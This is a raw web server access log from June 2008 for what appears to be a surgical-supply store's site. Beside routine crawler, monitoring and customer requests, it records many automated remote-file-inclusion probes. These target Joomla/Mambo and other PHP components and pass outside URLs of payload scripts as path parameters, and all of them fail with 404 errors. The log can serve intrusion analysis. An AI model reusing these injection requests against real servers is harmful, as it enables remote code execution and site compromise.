66.249.70.52 - - [10/Jun/2008:00:00:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F741B1F72497800A632072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.127.70.91 - - [10/Jun/2008:00:02:37 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
216.127.70.91 - - [10/Jun/2008:00:02:38 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
74.52.114.58 - - [10/Jun/2008:00:02:59 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.811"
74.52.114.58 - - [10/Jun/2008:00:02:59 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2008:00:03:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.19.120.178 - - [10/Jun/2008:00:05:06 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.812"
67.19.120.178 - - [10/Jun/2008:00:05:06 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.812"
66.6.223.160 - - [10/Jun/2008:00:05:32 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
66.6.223.160 - - [10/Jun/2008:00:05:32 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
160.99.12.231 - - [10/Jun/2008:00:05:53 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
160.99.12.231 - - [10/Jun/2008:00:05:53 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
66.249.70.52 - - [10/Jun/2008:00:06:25 -0400] "GET /logs/access_log.Q108060700 HTTP/1.1" 200 491534 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.41.206.97 - - [10/Jun/2008:00:07:57 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 142355 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [10/Jun/2008:00:08:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.70.52 - - [10/Jun/2008:00:12:11 -0400] "GET /logs/error_log.Q108052400 HTTP/1.1" 200 497907 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jun/2008:00:13:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.65.159.210 - - [10/Jun/2008:00:16:34 -0400] "GET /logs/xGB.php?act=admin&do=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 210 "-" "libwww-perl/5.76"
62.65.159.210 - - [10/Jun/2008:00:16:34 -0400] "GET /xGB.php?act=admin&do=http://rjoos.ch:/Reise/images/tOtti/r8? HTTP/1.1" 404 205 "-" "libwww-perl/5.76"
66.249.70.52 - - [10/Jun/2008:00:17:23 -0400] "GET /logs/error_log.Q108050500 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jun/2008:00:18:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.136.58.116 - - [10/Jun/2008:00:19:37 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../mc.jpg? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
64.136.58.116 - - [10/Jun/2008:00:19:37 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../mc.jpg? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
69.65.104.52 - - [10/Jun/2008:00:21:29 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 271 "-" "libwww-perl/5.810"
69.65.104.52 - - [10/Jun/2008:00:21:29 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../peler.jpg??? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
216.127.70.91 - - [10/Jun/2008:00:21:31 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://tugaspeed.info/system.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
216.127.70.91 - - [10/Jun/2008:00:21:31 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://tugaspeed.info/system.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
66.249.70.52 - - [10/Jun/2008:00:21:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0F741B1F72290800A332072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.202.242.102 - - [10/Jun/2008:00:23:21 -0400] "GET /logs/index2.php?x=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
213.202.242.102 - - [10/Jun/2008:00:23:21 -0400] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 213 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
213.202.242.102 - - [10/Jun/2008:00:23:21 -0400] "GET /index2.php?x=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
213.202.242.102 - - [10/Jun/2008:00:23:21 -0400] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 208 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
59.94.140.208 - - [10/Jun/2008:00:23:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:23:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:23:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:23:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [10/Jun/2008:00:23:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.156.192.5 - - [10/Jun/2008:00:24:05 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
213.156.192.5 - - [10/Jun/2008:00:24:06 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
59.94.140.208 - - [10/Jun/2008:00:24:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:24:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:24:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.94.140.208 - - [10/Jun/2008:00:24:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.70.52 - - [10/Jun/2008:00:26:06 -0400] "GET /logs/access_log.Q108053000 HTTP/1.1" 200 3123145 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [10/Jun/2008:00:28:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
163.16.195.253 - - [10/Jun/2008:00:32:44 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
163.16.195.253 - - [10/Jun/2008:00:32:53 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
198.173.255.213 - - [10/Jun/2008:00:33:06 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
198.173.255.213 - - [10/Jun/2008:00:33:06 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
209.59.12.99 - - [10/Jun/2008:00:33:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.129.32.158 - - [10/Jun/2008:00:35:15 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
189.129.32.158 - - [10/Jun/2008:00:35:15 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.249.70.52 - - [10/Jun/2008:00:32:00 -0400] "GET /logs/access_log.Q108051900 HTTP/1.1" 200 4073592 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.239.21.26 - - [10/Jun/2008:00:38:20 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
212.239.21.26 - - [10/Jun/2008:00:38:21 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2008:00:38:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.29.131.18 - - [10/Jun/2008:00:39:27 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
212.29.131.18 - - [10/Jun/2008:00:39:27 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
202.221.143.111 - - [10/Jun/2008:00:40:02 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
202.221.143.111 - - [10/Jun/2008:00:40:02 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
83.18.104.114 - - [10/Jun/2008:00:40:37 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://tugaspeed.info/system.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
83.18.104.114 - - [10/Jun/2008:00:40:37 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://tugaspeed.info/system.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
66.249.70.52 - - [10/Jun/2008:00:40:26 -0400] "GET /logs/error_log.Q108052000 HTTP/1.1" 200 427874 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.239.21.26 - - [10/Jun/2008:00:42:54 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
212.239.21.26 - - [10/Jun/2008:00:42:54 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
212.239.21.26 - - [10/Jun/2008:00:43:15 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
212.239.21.26 - - [10/Jun/2008:00:43:15 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2008:00:43:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.251.28.84 - - [10/Jun/2008:00:43:55 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/home_flash.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:57 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:57 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:58 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:58 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:58 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:59 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:59 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:43:59 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
212.239.21.26 - - [10/Jun/2008:00:44:00 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.811"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
212.239.21.26 - - [10/Jun/2008:00:44:00 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
221.251.28.84 - - [10/Jun/2008:00:44:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:01 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:01 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:01 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:01 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:02 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:02 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:04 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:03 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LCF643F1E4CF99900D6D207Z+M37+ENG HTTP/1.1" 200 37209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
221.251.28.84 - - [10/Jun/2008:00:44:05 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LCF643F1E4CF99900D6D207Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
